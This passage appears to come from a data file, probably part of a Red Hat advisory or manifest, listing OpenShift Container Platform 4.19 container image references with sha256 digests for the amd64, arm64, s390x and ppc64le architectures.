"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
